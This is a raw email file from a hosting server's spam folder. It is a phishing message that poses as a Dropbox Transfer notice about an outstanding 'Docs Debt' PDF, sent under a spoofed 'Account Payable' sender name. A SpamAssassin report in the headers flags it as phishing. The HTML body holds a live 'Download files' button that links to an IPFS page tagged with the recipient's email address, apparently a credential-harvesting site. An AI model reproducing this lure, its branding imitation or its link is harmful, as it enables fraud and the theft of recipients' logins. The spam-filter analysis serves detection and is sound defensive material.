OwlCyberSecurity - MANAGER
Edit File: 1712911519.M550326P3019857.premium128.web-hosting.com,S=9378,W=9540:2,
Return-Path: <mail@haytham.site> Delivered-To: atmane.kessai+spam@gourayafroid.com Received: from premium128.web-hosting.com by premium128.web-hosting.com with LMTP id wnimH5/0GGZRFC4AAvhI2g (envelope-from <mail@haytham.site>) for <atmane.kessai+spam@gourayafroid.com>; Fri, 12 Apr 2024 04:45:19 -0400 Return-path: <mail@haytham.site> Envelope-to: atmane.kessai@gourayafroid.com Delivery-date: Fri, 12 Apr 2024 04:45:19 -0400 Received: from [185.171.91.187] (port=38906 helo=netweb.com.tr) by premium128.web-hosting.com with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384 (Exim 4.96.2) (envelope-from <mail@haytham.site>) id 1rvCW6-00CdzY-1X for atmane.kessai@gourayafroid.com; Fri, 12 Apr 2024 04:45:19 -0400 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=izmiratavinc.com; s=default; h=Content-Transfer-Encoding:Content-Type: MIME-Version:Message-ID:Date:Subject:To:From:Sender:Reply-To:Cc:Content-ID: Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc :Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Unsubscribe: List-Subscribe:List-Post:List-Owner:List-Archive; bh=6hMrlUkQiF8N1rPPgv0BJhaTUHSDC9gjEd4atc2cRU8=; b=dt07wRHN/4z7vBGLTueT/tJNT/ D2qYit06ZOeaD0Uzm94G3LKX1atS1wlEDd9p4Rel5+ri6eFvjK25yhJyMnLMwpYFKQt4QPOnV9zDi qLYSl87SwOgIwHmIEW65SAICPHwVJwP5PJ0dSN2wQnBiT1QpSo12ZJ5QdHpqHZPz3GCQm77nlsjKu e/Mz7zYbvUzo52pgGJi7tQxiluArmxRT9q3NTTr4mHTScUkjLat1U/ytjy6xC28+yE/43YKHh0JCT h2lD59dKrBXip3aKFSDOuz8kTsuvNlyAuxcrbtKaAqNhpjeChhuXJa9bCF/CiWojsszNFEZubEoR1 5ojixczw==; Received: from [185.29.10.206] (port=64004 helo=ip-10-206.dataclub.eu) by srv1.dijitio.net with esmtpsa (TLS1.3) tls TLS_AES_256_GCM_SHA384 (Exim 4.96.2) (envelope-from <mail@haytham.site>) id 1rvCWr-00Cd8l-07 for atmane.kessai@gourayafroid.com; Fri, 12 Apr 2024 11:43:31 +0300 From: "Gourayafroid Account Payable" <mail@haytham.site> To: atmane.kessai@gourayafroid.com Date: 12 Apr 2024 10:43:30 +0200 Message-ID: <20240412104330.14D47A5E8511F1C1@haytham.site> MIME-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: quoted-printable X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - srv1.dijitio.net X-AntiAbuse: Original Domain - gourayafroid.com X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12] X-AntiAbuse: Sender Address Domain - haytham.site X-Get-Message-Sender-Via: srv1.dijitio.net: authenticated_id: info@izmiratavinc.com X-Authenticated-Sender: srv1.dijitio.net: info@izmiratavinc.com X-Source: X-Source-Args: X-Source-Dir: X-Spam-Status: Yes, score=11.1 X-Spam-Score: 111 X-Spam-Bar: +++++++++++ X-Spam-Report: Spam detection software, running on the system "premium128.web-hosting.com", has identified this incoming email as possible spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: Docs Debt 25032024.pdf to atmane.kessai@gourayafroid.com These files will be available until 4/12/2024 10:43:30 a.m.. Questions? Ask David (documents@dropbox.com) Download files Content analysis details: (11.1 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked. See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. [URIs: izmiratavinc.com] 2.5 URIBL_DBL_PHISH Contains a Phishing URL listed in the Spamhaus DBL blocklist [URIs: cf-ipfs.com] 1.5 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail) 1.5 SPF_HELO_SOFTFAIL SPF: HELO does not match SPF record (softfail) 0.5 URI_NOVOWEL URI: URI hostname has long non-vowel sequence 0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts 0.0 HTML_MESSAGE BODY: HTML included in message 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature 0.5 KAM_NUMSUBJECT Subject ends in numbers excluding current years 2.0 RDNS_NONE Delivered to internal network by a host with no rDNS 2.5 URI_CLOUDFLAREIPFS References Interplanetary File System PtP content via CloudFlare, likely phishing X-Spam-Flag: YES Subject: ***SPAM*** REF : Docs Outstanding 12.04.2024 <!DOCTYPE HTML> <html><head><title></title> <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> </head> <body style=3D"margin: 0.4em;"> <div><div style=3D'color: rgb(0, 0, 0); font-family: "Atlas Grotesk","Open = Sans","Helvetica Neue",Arial,sans-serif,serif,EmojiFont; font-size: medium;= '><div style=3D"padding: 24px 32px;"><div><h1 style=3D'line-height: 36px; f= ont-family: "Sharp Grotesk DB Medium",sans-serif,"Open Sans","Helvetica Neu= e",Arial; font-size: 28px;'>Docs Debt 25032024.pdf <span style=3D"font-size= : 20pt;"><span style=3D"font-size: 19pt;">to </span></span>atmane.kessai@go= urayafroid.com</h1> <p style=3D"margin: 8px 0px; line-height: 22px; font-size: 14px;">These fil= es will be available until <b>4/12/2024 10:43:30 a.m..</b><br>Questions? As= k David (<a target=3D"_blank" rel=3D"noreferrer">documents@dropbox.com= </a>)</p></div><table style=3D"margin-top: 20px;" border=3D"0" cellspacing= =3D"0" cellpadding=3D"0"><tbody><tr><td><br></td><td> <a style=3D'padding: 12px; text-align: center; color: rgb(247, 245, 242); l= ine-height: 18px; font-family: "Atlas Grotesk","Open Sans","Helvetica Neue"= ,Arial,sans-serif; font-size: 14px; margin-right: 8px; display: block; back= ground-color: rgb(0, 97, 254); text-decoration-line: none;' href=3D"https:/= /bafkreielxcx7elqgqa2ivv77zr3jht5uymzcdrzcv7w4mv7tlra4yad7vm.ipfs.cf-ipfs.c= om/#atmane.kessai@gourayafroid.com" target=3D"_blank" rel=3D"noreferrer"=20= data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://cloudflare-i= pfs.com/ipfs/bafybeidis6nkzuwol5dk2xacfydts72crvcnerzelvuvubnopuewlmqgna/no= th.htm%23%5B%5B-Email-%5D%5D&source=3Dgmail&ust=3D1712840800780000&= amp;usg=3DAOvVaw0ANZ52VhSTvWahcghL3HyW">Download files</a></td></tr></tbody= ></table></div></div> <div style=3D'padding: 0px 32px; color: rgb(0, 0, 0); font-family: "Atlas G= rotesk","Open Sans","Helvetica Neue",Arial,sans-serif,serif,EmojiFont; font= -size: medium;'><div style=3D"padding: 30px 0px 32px; border-top-color: cur= rentColor; border-top-width: 1px; border-top-style: solid;"><p style=3D'mar= gin: 8px 0px 0px; line-height: 22px; font-family: "Sharp Grotesk DB Medium"= ,sans-serif,"Open Sans","Helvetica Neue",Arial; font-size: 16px;'>Here's wh= at they sent you</p> <p style=3D"margin: 0px 0px 20px; line-height: 22px; font-size: 14px;">1 it= em • 609 KB</p><table style=3D"width: 476px; margin-bottom: 12px= ;" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"><tbody><tr><td style=3D= "width: 60px;"><br></td><td><p style=3D"margin: 0px; line-height: 22px; fon= t-size: 14px;">Contract0283.pdf</p><p style=3D"margin: 0px; color: rgb(102,= 102, 102); line-height: 22px; font-size: 12px;">850.1 KB</p></td></tr></tb= ody></table></div></div> <div style=3D'padding: 30px 32px 42px; color: rgb(255, 255, 255); font-fami= ly: "Atlas Grotesk","Open Sans","Helvetica Neue",Arial,sans-serif,serif,Emo= jiFont; font-size: medium; background-color: rgb(31, 31, 31);'><table borde= r=3D"0" cellspacing=3D"0" cellpadding=3D"0"><tbody><tr><td style=3D"width: = 444px;"><p style=3D"margin: 8px 0px; color: rgb(0, 0, 0); line-height: 22px= ; font-size: 14px;">[“#”]Help center</p> <p style=3D'margin: 8px 0px; color: rgb(0, 0, 0); line-height: 22px; font-f= amily: "Atlas Grotesk","Open Sans","Helvetica Neue",Arial,sans-serif; font-= size: 14px;'>[“#”]Feedback</p><p style=3D'margin: 8px 0px; colo= r: rgb(0, 0, 0); line-height: 22px; font-family: "Atlas Grotesk","Open Sans= ","Helvetica Neue",Arial,sans-serif; font-size: 14px;'>[“#”]Pri= vacy & terms</p> <p style=3D'margin: 36px 0px 8px; color: rgb(0, 0, 0); line-height: 22px; f= ont-family: "Atlas Grotesk","Open Sans","Helvetica Neue",Arial,sans-serif; = font-size: 14px;'>[“#”]About Drpbox Transfer</p><p style=3D'mar= gin: 8px 0px; color: rgb(0, 0, 0); line-height: 22px; font-family: "Atlas G= rotesk","Open Sans","Helvetica Neue",Arial,sans-serif; font-size: 14px;'>[&= #8220;#”]Upgrade your plan</p></td> <td style=3D'width: 32px; font-family: "Atlas Grotesk","Open Sans","Helveti= ca Neue",Arial,sans-serif; font-size: 14px;'><div style=3D'font-family: "At= las Grotesk","Open Sans","Helvetica Neue",Arial,sans-serif,serif,EmojiFont;= margin-top: 120px;'><br></div></td></tr></tbody></table></div><div style= =3D'padding: 16px; text-align: center; color: rgb(68, 68, 68); line-height:= 20px; font-family: wf_segoe-ui_normal,"Segoe UI","Segoe WP",Tahoma,Arial,s= ans-serif,serif,EmojiFont; font-size: 12px;'><div> <p style=3D"line-height: 20px;"><br></p></div></div></div> </body></html>